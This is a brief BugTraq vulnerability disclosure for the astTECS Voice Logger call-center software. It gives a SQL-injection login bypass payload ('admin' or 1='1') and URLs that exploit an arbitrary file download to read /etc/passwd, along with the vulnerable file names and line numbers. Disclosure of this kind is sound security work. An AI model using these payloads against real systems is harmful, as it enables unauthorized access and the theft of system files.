BugTraq
Voice Logger astTECS - bypass login & arbitrary file download Jul 16 2013 09:01AM
MichaÅ? BÅ?aszczak (blaszczakm gmail com)
Author: Michal Blaszczak
Website: http://blaszczakm.blogspot.com
Project: hack voip - http://blaszczakm.blogspot.com/search/label/hack%20voip
Date: 16.07.2013

Voice Logger - VoIP software for Call Center

1) bypass login
login: admin' or 1='1
password: admin

line: 168 file: manager_login.server.php

2) arbitrary file download

http://192.168.15.145/poligon/asttecs/records1.php?file=/etc/passwd
linie: 2 file:records.php

http://192.168.15.145/poligon/asttecs/records.php?file=/etc/passwd
linie: 2 file:records.php

3) and other security bugs

MichaÅ? BÅ?aszczak
http://blaszczakm.blogspot.com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus